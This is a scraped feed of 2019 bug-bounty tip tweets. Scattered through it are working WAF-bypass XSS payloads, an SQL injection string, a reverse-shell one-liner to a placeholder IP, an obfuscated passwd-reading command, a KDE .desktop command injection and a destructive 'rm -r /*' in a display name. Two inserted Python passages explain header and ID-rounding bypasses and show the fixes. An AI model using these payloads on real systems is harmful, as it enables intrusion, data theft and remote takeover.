1 Bug Bounty Tips - Always Read The Source Code //<>// #BugBounty #BugBountyTip
vj0shii
@vj0shii


2019-08-16 12:30:00
0 Best laptop for Penetration Testing and Bug Bounty Hunting @Apple @Dell @ASUS_ROG #bugbountytip #Pentesting
Detectify
@detectify


2019-08-16 11:00:10
0 Improving WordPress plugin security from both attack and defense side. Guest blog by @padannewitz. #detectifycrowdsource #bugbountytip https://t.co/627leeeH6R
abdoul gadiri balde
@moodiAbdoul


2019-08-16 10:26:29
1 #bugbounty #bugbountytips #bugbountytip Never think that you can find nothing; I hacked a company that has top hackers in 00:51:31 #togetherwehitharder
Fisher
@Regala_


2019-08-16 07:32:13
0 Beta testing for Scope Monitor has started 🥳🥳 #bugbounty #bugbountytip https://t.co/KREdPY8rJT

@saurinn_


2019-08-16 01:40:12
0 Anyone have a link for a tool to test for different kinds of tokens (Docker specially)? It has a GitHub repo #bugbountytip #bugbountytips #infosec
Mo'men Basel
@Momenbassel


2019-08-15 22:40:44
0 HTTP request headers can be a golden gem for finding vulnerabilities never miss tampering/adding these headers! https://t.co/SdDV656qa7 #BugBounty #bugbountytip #bugbountytips
Hussein Daher
@HusseiN98D


2019-08-15 22:05:06
7 A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! ALSO: I'm interested in any security research team / pentest work (remote). If any company/team is interested about my services DM me :) #bugbounty #bugbountytips #bugbountytip #infosec https://t.co/S1BpVB2LWM
Spicy
@BlackSheepSpicy


2019-08-15 21:31:56
0 #bugbountytip brought this up in @thecybermentor 's stream chat last night but you can load line separated text files into burp suite's scope so you can literally paste sublist3r's output into a text file and chuck the entire scope into burp with just a few clicks #BugBounty
Daher Mohamed
@DaherMohamed4


2019-08-15 20:14:51
0 #BugBountyTip #BBTip If you have Win10 and don't want to/can't install Linux, you can use this tutorial to have a Linux/Ubuntu terminal on Windows: https://t.co/ftDEbdjv8U Must have Win10 64-bit
m0z
@LooseSecurity


2019-08-15 14:44:56
1 A lot of programmers seem to forget that POST parameters pose the exact same risks as GET parameters. POST-Based XSS POST-Based CSRF You can even get SQL Injection through POST parameters. It's obvious but some people only check GET parameters out of convenience. #bugbountytip
MRunal
@mrunal110


2019-08-15 10:10:41
4 I just published What is Server-Side Request Forgery (SSRF) and some proof of concept about SSRF. https://t.co/uaTPqB470R #bugs #bugbountytip #infosecurity #cybersecurity #responsibledisclosure #vulnerabilities
Alex Chapman
@ajxchapman


2019-08-15 08:45:26
1 When you get RCE/ Command Injection on a server, check the system uptime. This can reveal the (ab)use of containers and help clarify technical risk #bugbountytip learned from @erbbysam at #h1702
Hendrik
@hendrikvb


2019-08-14 21:29:12
0 #CSRF lesson of the day: IE11 does not properly handle #CORS checks on file URIs! #bugbountytip #vuln #infosec
lavernasec
@lavernasec


2019-08-14 14:38:00
0 Pwn an iPhone to bank $1m and Check Point gripes about WhatsApp privacy again https://t.co/fBUkEesuVv #bugbountytip #iphone #whatsapptips #privacy
{{ '127.0.0.1’}}
@shivam31200


2019-08-14 08:45:53
0 When testing e-commerce websites, always check the CMS. I found one e-commerce website using Magento, ran a Magento scan and found critical paths #bugbounty #bugbountytip Noob https://t.co/BBBPNECcrw
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-14 00:19:08
2 </>Cloudflare skip filters, ~XSS Bypass via dot. <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X #WAF #BugBounty #BugBountyTip #infosec
HackIsOn ®
@hackison


2019-08-13 20:17:42
2 Here is a video about the complete step by step installation procedure of latest #nmap 7.80. #hacking #kalilinux #linux #bugbountytip #bugbounty #penetrationtesting #pentesting #windows #redteam 🔴 LINK: https://t.co/8FTl0sOOgT
Vail
@Vail_302


2019-08-13 19:41:01
0 I am still new to #bugbounty , however, if this can help anyone else, I built a cherrytree template to help with organization of targets. Any tips on making it better, let me know. #bugbountytip https://t.co/Ew4mIgsFiu
MRunal
@mrunal110


2019-08-13 18:35:46
0 I Published open-redirect-vulnerability blog https://t.co/tZezs6hMUN #bugs #bugbountytip #infosecurity #cybersecurity
ADM|N|STRAT0R
@strat0r


2019-08-13 17:54:39
0 You can use https://t.co/5wzwWvgY36 or google cache to peek at the landing page for public GitHub repos that have been taken offline ;) #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-13 16:14:40
1 Amazon EBS snapshots exposed publicly leaking sensitive data in hundreds of thousands, security analyst reveals at DefCon 27 #BugBounty #BugBountyTip #devops #devsecops #penetrationtesting #pentesting #aws #cloud #security #cloudsecurity https://t.co/E0M5006vhc
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-13 12:52:25
0 Bug bounty is a project designed to stop hackers and to learn the techniques and methods of hackers. { fucking mercenaries }; #BugBounty #BugBountyTip #WAF #infosec
Fisher
@Regala_


2019-08-13 08:54:07
1 Bounty hunters: how do you organize your notes on targets, especially when switching targets back and forth and doing it for a long time? A thread 👇👇👇 #bugbounty #bugbountytip
GarimaShares
@GarimaBhaskar


2019-08-13 06:50:02
0 Apple is Offering a Bug Bounty of $1 Million If You Can Hack An iPhone https://t.co/nea8djOCnK #Apple #appledaily #applenews #AppleEvent #bugbountytip #MiLLiONS #technews #technologynews #hacking #Hackers #TechTrends #bloggerstribe #blogger #blogpost #garimashares #iOS #macOS https://t.co/Lk3P2YJyt8
mr_nyx
@mr_nyxs


2019-08-12 21:33:27
0 If you have a shop system or any other buying system, you should try intercepting both requests and responses and change the prices in both of them, you might find yourself paying only $5 instead of $1000 #BugBountyTip #BugBounty #parameter_tampering
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-12 20:09:34
0 109 Payloads {URL} for #Hackerone_Programs #DOD #Private_Programs #Public_Programs #bugbounty #recon #bugbountytip https://t.co/e8Tm8nwz2B
Mufeed VH
@mufeedvh


2019-08-12 16:52:00
1 sector:443 CTF Walkthrough: https://t.co/0BWhT2HYFj #ctf #capturetheflag #bugbounty #bugbountytip #bugbountytips
lavernasec
@lavernasec


2019-08-12 14:38:00
0 Apple will now pay hackers up to $1 million for reporting vulnerabilities https://t.co/kYH14KVkB9 #bugbountytip #Apple #vulnerabilities
Ammar Amer
@cry__pto


2019-08-12 12:01:33
2 Open redirects are a dangerous web application vulnerability that should not be ignored by the security team/bug bounty hunters. This vulnerability may lead to malware installation/phishing attacks, and at the least the loss of reputation and clients. #bugbountytip
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-12 11:38:33
0 #Verizon - CORS vulnerability leads to information disclosure (critical impact) #BugBounty #BugBountyTip #CORS https://t.co/zDzL0gjDK9
Wladimir Palant
@WPalant


2019-08-12 09:06:09
2 I tried producing some useful instructions for less experienced people to recognize flaws in password managers. Let me know whether it worked! #infosec #crypto #passwords #bugbounty #bugbountytip https://t.co/WTm5SDpTi9
Ameen
@ameenmaali


2019-08-12 06:48:12
3 #bugbountytip: Duplicating params, headers, etc can be useful for bypasses. i.e., file upload filters can potentially be bypassed by setting Content-Type twice (once for unallowed type and once for allowed). Authorization protection could be bypassed w/ the same method #bugbounty
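The duplicate-header trick in the tip above works when the component doing the check and the component doing the work pick different copies of a repeated header. The following is an added example, not the tweeter's code: a constructed request carrying `Content-Type` twice, one parser where the last copy wins (typical of code that builds a dict) and one where the first wins, the upload filter that the mismatch defeats, and a hardened version that refuses repeated singleton headers before looking at their values. The header list, allowlist and hostnames are constructed.

```python
"""Duplicate-header differential: filter and backend disagree on which copy wins.

Added example, not the tweeter's code. The raw request, the allowlist and
the two parsing policies are constructed to show the mechanism.
"""
from typing import Dict, Iterable, List, Tuple

ALLOWED_UPLOAD_TYPES = {"image/png", "image/jpeg"}

# Constructed request: Content-Type sent twice, forbidden type first.
RAW_HEADERS: List[Tuple[str, str]] = [
    ("Host", "upload.target.example"),
    ("Content-Type", "application/x-php"),
    ("Content-Type", "image/png"),
]

# Headers that must appear at most once; a repeat is an attack signal, not noise.
SINGLETON_HEADERS = ("content-type", "content-length", "host", "authorization")


def last_wins(headers: Iterable[Tuple[str, str]]) -> Dict[str, str]:
    """Dict-building parser: a later copy overwrites an earlier one."""
    out: Dict[str, str] = {}
    for name, value in headers:
        out[name.lower()] = value
    return out


def first_wins(headers: Iterable[Tuple[str, str]]) -> Dict[str, str]:
    """Parser that keeps the first copy and ignores the rest."""
    out: Dict[str, str] = {}
    for name, value in headers:
        out.setdefault(name.lower(), value)
    return out


def vulnerable_upload(headers: List[Tuple[str, str]]) -> Tuple[int, str]:
    # Bug: the filter reads the last copy ('image/png') and approves; the
    # storage layer reads the first copy and records the file as PHP.
    if last_wins(headers).get("content-type") not in ALLOWED_UPLOAD_TYPES:
        return 415, "rejected"
    stored_type = first_wins(headers)["content-type"]
    return 201, f"stored as {stored_type}"


def duplicated_singletons(headers: Iterable[Tuple[str, str]]) -> List[str]:
    """Names from SINGLETON_HEADERS that occur more than once."""
    counts: Dict[str, int] = {}
    for name, _ in headers:
        n = name.lower()
        if n in SINGLETON_HEADERS:
            counts[n] = counts.get(n, 0) + 1
    return sorted(n for n, c in counts.items() if c > 1)


def hardened_upload(headers: List[Tuple[str, str]]) -> Tuple[int, str]:
    # Fix: reject ambiguity outright, then check and store the same value.
    dupes = duplicated_singletons(headers)
    if dupes:
        return 400, "duplicate header(s): " + ", ".join(dupes)
    ctype = first_wins(headers).get("content-type")
    if ctype not in ALLOWED_UPLOAD_TYPES:
        return 415, "rejected"
    return 201, f"stored as {ctype}"


if __name__ == "__main__":
    print("vulnerable:", vulnerable_upload(RAW_HEADERS))
    print("hardened:  ", hardened_upload(RAW_HEADERS))
```

The same `duplicated_singletons` check covers the `Authorization` case the tip mentions: a proxy that authenticates on one copy while the application reads the other is the same differential with a different header name.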
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:55:30
1 Finding was closed, no return. @YoncuBilisim #WAF #BugBounty #BugBountyTip #infosec https://t.co/eoVvedJriy
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-10 15:52:25
0 { Cloudflare }; ~ XSS Bypass: 🦍 </Scrpt/"%27--!>%20<Scrpt>%20confirm(1)%20</Scrpt> #BugBounty #WAF #BugBountyTip #infosec
[email protected]:~$ sud¤ rm -r /*
@IAMPROPERSAM


2019-08-10 12:15:05
0 I and so many others out there definitely need this... Thanks man. #bugbountytip #bugbountytips https://t.co/wUNiL9k1t7
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 06:05:19
3 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #BugBounty #BugBountyTip #infosec
Aziz Hakim
@hackerb0y_


2019-08-10 05:48:46
1 [ HTML Rich Text XSS Payload ] <div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">hackerb0y</button> #infosec #bugbountytips #bugbountytip #bugbounty #xss
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 05:29:43
0 13 Hours ~ Fullstack Bug Bounty Programs H1 - 5 Reports Triaged Bugcrowd - 1 Triaged Yeswehack - 4 Triaged Graphql SQL-Injections / CORS / Blind SQL #BugBounty #BugBountytip #13hours #livehacks https://t.co/odsYNkdX2A
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-10 01:31:17
1 Graphql Api Leads to SQL - Injections #graphql #bugbounty #bugbountytip #bugbountytips https://t.co/lFNawsyPA5
Securisec 🚀
@securisec


2019-08-09 22:46:15
0 "RT RT zer0pwn: Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/5f2PjHvwNE #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/1poKJWd4FW"
Arif Khan
@payloadartist


2019-08-09 20:15:13
0 I earned $1,500 for my submission on @bugcrowd #ItTakesACrowd #bugbountytip: Recon is the key to low hanging fruits with great impact! https://t.co/7of1OAuwxa
Guilherme Keerok
@k33r0k


2019-08-09 19:47:55
1 another Cloudflare bypass: <iframe/src=javascript:%2520with(document)with(body)innerHTML="<svg/onload"%2B"=alert\x28\x29\x3e"> #bugbountytip #bugbounty #xss #bugbountytips
expl0itc0der
@vanshitmalhotra


2019-08-09 19:19:28
0 If you have found an XSS on https://t.co/hykP1iWSJZ, find pages running this code on https://t.co/bveLMweNqR: document.domain="https://t.co/dLs7d73fmn" It results in: XSS on A > XSS on B, as SOP allows https://t.co/hykP1iWSJZ to access https://t.co/bveLMweNqR #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:07:47
0 Cryptographic Attacks: A Guide for the Perplexed https://t.co/tRqja9L8pA Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
expl0itc0der
@vanshitmalhotra


2019-08-09 19:06:10
3 One Misconfig (JIRA) to Leak Them All- Including NASA and Hundreds of Fortune 500 Companies! https://t.co/k6aYmRDj1e Follow #Hackdoor - Facebook - https://t.co/iNczOcGmCt Twitter - https://t.co/KupiQVo8ex Youtube - https://t.co/42lWP1DIW0 #BugBounty #bugBountyTip
intigriti
@intigriti


2019-08-09 12:08:03
4 Doing recon? Don't forget the company resources! Slides, tutorials and other examples often contain a lot of juicy information! 👀Thanks for the #BugBountyTip, @Alyssa_Herrera_! #HackWithIntigriti https://t.co/CT1UYBZefH
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-09 09:51:11
1 #blindrce turn it in to a { reverse shell! } 👁️ |`bash -i >& /dev/tcp/yourip/yourport 0>&1` #bugbounty #bugbountytip #waf #infosec
Ennio Campagna
@EnnioCamp


2019-08-09 08:36:10
0 Got excited this morning, just entered the @CERTEU Hall of Fame, thank you to the #securityteam for the fast response! #bugbounty #bugbountytip Perseverance is the key to success
Yassine Aboukir @ DefCon/H1-702
@Yassineaboukir


2019-08-08 20:46:55
0 Cheers to @NahamSec for featuring [ASNLookup](https://t.co/wGiLKKnvCb) tool in his latest stream about techniques to enumerate more assets leveraging Yahoo's ASN as a target example. Check it out! https://t.co/PcoHujPdsV #bugbountytip
Ameen
@ameenmaali


2019-08-08 20:12:30
2 Testing authorization/access controls with a numeric ID? Try decimals/floats and round to the number you want to access. Example: admin role ID is 1 Try to set your ID to 0.9 and it may bypass the auth check as system will round up after auth check #bugbountytip #bugbounty
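Added example, not from the tweet: the failure mode described above is an authorization check made on the raw float, followed by rounding for the lookup. The role table, the protected ID and the caller flag are constructed for illustration, next to a hardened version that canonicalizes the ID before checking it.

```python
"""Authorization on a numeric ID: vulnerable float-then-round pattern vs. a strict check.

Constructed example. ADMIN_ROLE_ID follows the tip (admin role ID is 1);
ROLES and the caller_is_admin flag are hypothetical.
"""
import re
from typing import Optional

ADMIN_ROLE_ID = 1
ROLES = {1: "admin", 2: "editor", 3: "viewer"}   # constructed sample table


def vulnerable_get_role(raw_id: str) -> Optional[str]:
    """Mimics the bug: authorize on the parsed float, then round for the lookup."""
    value = float(raw_id)              # "0.9" -> 0.9, which is not equal to 1
    if value == ADMIN_ROLE_ID:
        return None                    # only an exact 1.0 is denied
    key = int(round(value))            # 0.9 rounds to 1: the admin row is returned
    return ROLES.get(key)


# Canonical form: an unsigned decimal integer with no sign, whitespace, exponent or fraction.
_INT_ID = re.compile(r"(0|[1-9][0-9]*)")


def hardened_get_role(raw_id: str, caller_is_admin: bool = False) -> Optional[str]:
    """Fix: canonicalize first, then authorize on exactly the value used for the lookup."""
    if not _INT_ID.fullmatch(raw_id):
        return None                    # "0.9", "1e0", "+1", " 1" are all rejected
    key = int(raw_id)
    if key == ADMIN_ROLE_ID and not caller_is_admin:
        return None                    # same key that will be looked up below
    return ROLES.get(key)
```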
Dominik
@zer0pwn


2019-08-08 17:24:08
11 Bruteforce subdomains from browser (thanks to Marzavec). Works by using DNS over HTTP for resolution. https://t.co/L0P5wVuwFD #security #bugbounty #bugbountytip #security #redteam #osint #discovery https://t.co/lxygQ8RqSK
gujjuboy10x00
@vis_hacker


2019-08-08 15:30:21
1 awesome git recon for bug hunters, especially for newbies @Bugcrowd #ItTakesACrowd #bugbountytip https://t.co/I1r38Ms06X
Spicy
@BlackSheepSpicy


2019-08-08 15:26:51
0 #bugbountytip web server being annoying and 302ing your gobuster? use the wildcard flag and pipe the output thru an inverted grep expression #bugbounty https://t.co/KGeBLCvVzf
artofbugbounty
@artofbugbounty


2019-08-08 15:08:15
0 Not Your Typical Base64 Encoded Data! #bugbountytip https://t.co/pzvYvpzUm6 https://t.co/akZueVxv7o
A DNF 🦖
@binb4sh


2019-08-08 10:47:40
0 If you have found an XSS on https://t.co/N5KFrxiY6l, find pages running this code on https://t.co/qV8UvGQ3nY : document.domain="https://t.co/2KVRowDP4i" It results in: XSS on A > XSS on B as SOP allows https://t.co/N5KFrxiY6l to access https://t.co/qV8UvGQ3nY #bugbountytip
Aashish Yadav
@aa5h15h


2019-08-08 10:26:05
1 Listed In Mozilla HOF https://t.co/hjvZ92kFOj #bugbounty #bugbountytip #webdev #mozilla #firefox #hackerone #bugcrowd #linux #unix #malware @mozilla
Mantis
@MantisSTS


2019-08-08 07:54:08
1 This should come in useful to some! #BugBounty #bugbountytip https://t.co/3jjJ8PrB2c
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-08 07:01:47
0 Paypal Bug Bounty 2019 - Exploiting HTML Injections https://t.co/EvfnAj5QmI #Paypal #BugBounty #BugBountyTip
Benson M
@Benson_Mwaura


2019-08-08 05:00:00
0 🛡️ Discover How Do Bug Bounties Fit Into The Software Development Lifecycle (#infographic 🎨 @Hacker0x01 ) @Fisher85M @pierrepinna @Shirastweet @CLAVDIAmartin @marcoessomba @ggithaiga #Cybersecurity #SecOps #DevOps #CISO #Cloudsec #Infosecurity #bugbountytip #bountyprogram https://t.co/TmRTGB8Mhv
Sanju
@sanjeethboddi


2019-08-08 02:45:12
0 @Amazon If you say simple "another" to the Alexa. It tells you a joke, which doesn't make any sense. You need to fix your NLP/NLG and make you have a proper dialogue flow. #bugbountytip #bugreport #alexa #amazonalexa #nlp #nlg
vavkamil
@vavkamil


2019-08-07 20:21:10
1 XFFenum ~ A simple tool to bypass 403 forbidden end-points behind load balancers (Cloudflare) based on X-Forwarded-For header #bugbounty #bugbountytip https://t.co/BR0X8TlGfT
Sajibe Kanti
@Sajibekantibd


2019-08-07 20:04:45
0 Sometimes check cookies when testing a PHP-based web app in a pentest. Maybe you will get the password & user id in cookies ;) #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 19:58:38
0 Reading { #passwd }, and other files. 🐧 /***/[c][a]* /**[c]/*****[d] {/???/??t,/**[c]/*****[d]} /***/??t /**[c]/*****[d] /***[n]/??t /??[c]/?????[d] #WAF #BugBounty #BugBountyTip #infosec
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-08-07 19:01:41
0 #bugbountytip #bugbountytips Path: target/worker Yesterday my report Worker Loop Admin panel Noswag, nobounty, nothing Only thanks from owner :) sometime I am kind :) https://t.co/6yIqsMpfU6
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-07 16:51:53
0 XSS { Cloudflare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
intigriti
@intigriti


2019-08-07 16:51:01
0 Got a question? Follow @codingo_'s advice to get help faster! #BugBountyTip https://t.co/pkmcXReL9P
expl0itc0der
@vanshitmalhotra


2019-08-07 16:23:29
2 Security through obscurity works against scanners -- Agree/Disagree ?? #BugBounty #BugBountytip #penetrationtesting #pentesting #hacking #devops #devsecops
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-07 13:20:11
13 XSS { Cloudflare } bypass: 🔭 </> " <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> " </> #WAF #BugBounty #BugBountyTip #infosec
Pavandeep
@Pavandep8


2019-08-07 13:13:18
0 Look what I shared: An introduction to Stack Buffer Overflows - #Hacking #hacker #Security #bugbountytip #BugBounty @MIUI| https://t.co/hM2ysqlhmI
expl0itc0der
@vanshitmalhotra


2019-08-07 12:46:03
0 https://t.co/X7i6Q9BLRA - SEARCH FOR LEAKS Search for Twitter users leaks #OSINT #recon #bugbounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-07 11:52:48
2 go ahead and get those awesome free Udemy courses for a limited time about python, hacking, CEH, networking, cybersecurity. 18 awesome courses for a limited time. The offer may end after 6 hours, so please share the post. #Hacking #pentest #bugbountytip #infosec #osint https://t.co/Gfiei78NO7
miraitowa
@miraitowa1


2019-08-07 10:25:53
0 Mahmoud Gamal - Security Blogs: Exploiting Out Of Band XXE using internal network ... https://t.co/CgGJMGZWfT #Bugbounty #bugbountytip #XXE
Hilary Sylar
@bit3c0de


2019-08-07 08:57:12
0 In honour of the best XSS tool out here, I wrote a small post about it. Simple and to the point. Great success with it and thought I'd share. https://t.co/UtvkJ3XFu0 #BugBounty #bugbountytip #pentest #xss #knoxss Thanks for the tool @brutelogic .
Mo'men Basel
@Momenbassel


2019-08-07 06:24:37
3 #bugbountytip: install keyFinder in your browser (https://t.co/TqSwU28eb4) --> surf the web --> go to results --> check API keys at https://t.co/S3jRAYOEZp #BugBounty #bugbountytips #BugbountyProTip https://t.co/s0uGltinAD
expl0itc0der
@vanshitmalhotra


2019-08-06 20:53:06
0 Any script/one-line command on the AWS CLI to quickly get the list of permissions enabled for an S3 bucket? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl --bucket bucketname
Pepipost
@pepi_post


2019-08-06 18:27:35
0 Are your emails really reaching Inbox? Find out in this free Email Health Report. Click here : https://t.co/Qr4QcFTjbi #bugbountytip #smtp https://t.co/2U7otQsTLZ
Pepipost
@pepi_post


2019-08-06 16:39:14
1 Is there a way to validate email addresses using #javascript? Let's find out how! 👉 #bugbountytip https://t.co/9FBQD6PGOH
Ammar Amer
@cry__pto


2019-08-06 15:02:59
1 in the 19th chapter of Real-World Bug Hunting by @yaworsk you will get a useful and detailed chapter about target RECONNAISSANCE and testing the application in an efficient and practical way. Again, the book is highly recommended. You can find the book at Amazon #bugbountytip https://t.co/fPMrQyktZJ
Dhamu
@Dhamuharker


2019-08-06 14:50:27
1 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder XSS to RCE https://t.co/6YM2sk2j9Z
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-06 13:21:38
2 Bypass 405 Alibaba { WAF }; 🐞 with onloadstart/end and encode the parenthesis, /* <audio src=1 onloadstart=alert(1)//> */ #WAF #BugBounty #BugBountyTip #infosec
miraitowa
@miraitowa1


2019-08-06 13:02:37
3 Recon — my way. by @ehsahil https://t.co/5sLBmHqhM8 #bugbounty #bugbountytip #recon
expl0itc0der
@vanshitmalhotra


2019-08-06 12:39:44
0 #Subfinder - Installation and Usage - #hackdoor #bugbounty #tutorial #bugbountytip https://t.co/gQgX9bc4ab
expl0itc0der
@vanshitmalhotra


2019-08-06 12:17:42
1 #Sublister - Installation And Usage Tutorial #bugbounty #bugbountytip #hackdoor https://t.co/hp38xeL37x
expl0itc0der
@vanshitmalhotra


2019-08-06 12:13:31
1 #OWASP #JuiceShop - Challenge / SQL Injection Tutorial #hackdoor #devops #devsecops #bugbounty #bugbountytip https://t.co/N4vjkRujJj
Pepipost
@pepi_post


2019-08-06 09:31:48
3 Send email from website using #javascript #bugbountytip https://t.co/MIzaxCbzXt
Pepipost
@pepi_post


2019-08-06 09:24:59
1 Send email to multiple recipients using AddAddress() in #phpmailer #bugbountytip https://t.co/7JklR843zt
bayani elogada
@metamudkip


2019-08-06 02:33:37
0 The lack of Access-allow-* headers disable CORS on Javascript, but not Postman. Not really a #bugbountytip but oh well
Konark Modi
@konarkmodi


2019-08-05 22:24:15
0 As always a brilliant finding by @logicbomb_1 . Btw, apart from google dork queries you can also use Common Crawl Index to increase your coverage. Example: ``` curl -sX GET "https://t.co/7l4F17TQKh" | jq -r .url | sort -u | cut -d'/' -f3 | sort | uniq ``` #bugbountytip https://t.co/MnOLHGtEg2
Dominik
@zer0pwn


2019-08-05 17:42:05
10 KDE 4/5 KDesktopFile (.desktop) Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/QRtX9Kwd1w
Petko D. Petkov
@pdp


2019-08-05 17:40:15
0 Before running you’ve got to warm up. Before public speaking you’ve got to warm up. But I’ve rarely seen anyone consciously taking steps to warm up before hacking. How is this any different? To get good results you need to make sure your mind is in the right state. #bugbountytip
intigriti
@intigriti


2019-08-05 14:26:22
8 According to @itscachemoney, this sometimes leads to account takeover vulnerabilities. 🤯#BugBountyTip #HackWithIntigriti https://t.co/jQ84SF3tdq
Ammar Amer
@cry__pto


2019-08-05 08:00:11
1 have questions about hacking? Ask the questions in the comment section. I will help you. #bugbountytip #hacking #redteam #osint #cybersecurity #infosec
Dominik
@zer0pwn


2019-08-05 03:56:03
0 KDE 4/5 KDesktopFile Command Injection. Fits in a tweet. [Desktop Entry] Icon[$e]=$(echo${IFS}0>~/Desktop/zero.lol&) https://t.co/Iy3UPrSuhE #redteam #0day #security #bugbounty #bugbountytip #bugbountytips #kde #rce #zerodotlol #zerolol https://t.co/Z49mw6rLni
Ennio Campagna
@EnnioCamp


2019-08-04 22:10:09
0 Great stream @NahamSec, every time I learn something new from your streaming 🙏 #bugbountytip #recon
Fisher
@Regala_


2019-08-04 18:22:18
2 Mediocre hunters: fuck there is no way there is a bug on this long standing hardened target Pro hunters: pretty sure there's a bug here somewhere #bugbounty #bugbountytip
Konark Modi
@konarkmodi


2019-08-04 17:25:14
2 If you are testing access to S3 buckets and do not want to configure credentials for testing, use --no-sign-request. 'aws s3 command s3://bucket/file --no-sign-request' #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 13:46:58
1 CloudFlare { XSS } Bypass Payload via dot: 🐞 <--`<img/src=` onerror=confirm``> --!> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-04 10:19:52
3 Exactly this 🕵️‍♂️ #WAF #BugBounty #BugBountyTip #infosec https://t.co/RPfTOEfvU9
Guilherme Keerok
@k33r0k


2019-08-04 01:29:45
1 XSS Cloudflare WAF bypass: <img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> #bugBounty #bugbountytip
Ammar Amer
@cry__pto


2019-08-04 00:26:41
3 you can use this tool to dynamically generate your own security (XSS, SQLi, email-format, etc.) payloads for fuzz testing: https://t.co/tONSfTriWq example: echo "<script>alert(1)</script>" | radamsa -n 5 --patterns od #bugbountytip #bugbounty #Hacking #pentest
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 21:58:27
0 SQL WAF-Fail2Ban Payload via dot 👾 (SELECT 6037 FROM(SELECT COUNT(*),CONCAT(0x7176706b71,(SELECT (ELT(6037=6037,1))),0x717a717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) #WAF #BugBounty #BugBountyTip #infosec
Ammar Amer
@cry__pto


2019-08-03 21:02:35
1 you should not depend only on one tool to get the job done; you should always use 3 or 4 tools to make sure that you get the required/true results. This applies to all hacking stages, like OSINT & scanning, etc. #bugbountytip #osint #Hacking
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-03 18:46:27
0 Gaining Shell using Server Side Template Injection (SSTI) by @davidvalles007 #bugbountytip https://t.co/07uhXW7Hza
SECARMY
@secarmyofficial


2019-08-03 18:40:30
1 😱Hurry Join Book Your Seats Now 💢For Web App Pentesting Training 🌀Tomorrow Is Last Day Sign up to below link🔗 https://t.co/9EPBgaPB5R #Hackers #HackerSummerCamp #HackLearning #bugbounty #bugbountytip #WebApp https://t.co/DBocFwUbUD
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-03 17:48:25
0 XSS { Cloudflare } bypass: 👾 <a+HREF='%26%237javascrip%26%239t:alert%26lpar;document.domain)'> #WAF #BugBounty #BugBountyTip #infosec
Random Robbie
@Random_Robbie


2019-08-03 13:18:26
6 #bugbountytip - Got a LFI on a php app.... Check for sessions at /var/lib/php/session Should be easy account takeover from there :D
expl0itc0der
@vanshitmalhotra


2019-08-03 09:49:14
0 Any script/one-line command on the AWS CLI to quickly get the list of permissions enabled for an S3 bucket? @awscloud #bugbounty #bugbountytip Command - aws s3api get-bucket-acl --bucket bucketname
Ennio Campagna
@EnnioCamp


2019-08-03 06:34:31
0 New entry!! Time to #learn ! #bugbounty #bugbountytip https://t.co/ha26xRNaET
XRSI
@XRSIdotorg


2019-08-02 18:58:40
0 Trust, Privacy and Safety will define the success of XR Technologies. That's why #XRSI is in conversations with industry leaders to roll out a dedicated #XR #bugbounty program, so we stay ahead of the bad guys : https://t.co/jsB7Zd2Aop. #BugBountyTip #appsec #AR #VR @ReadyHackerOne https://t.co/esWcitsv16
Andri Wahyudi 🕊️ ‏
@andripwn


2019-08-02 18:39:19
0 How do I open a report that has been closed by @Hacker0x01? Give an impact and a very clear explanation to open your report and have it become Triaged #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-02 16:27:45
1 Network ~javascript execution payload: { <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus> } #WAF #BugBounty #BugBountyTip #infosec
Detectify
@detectify


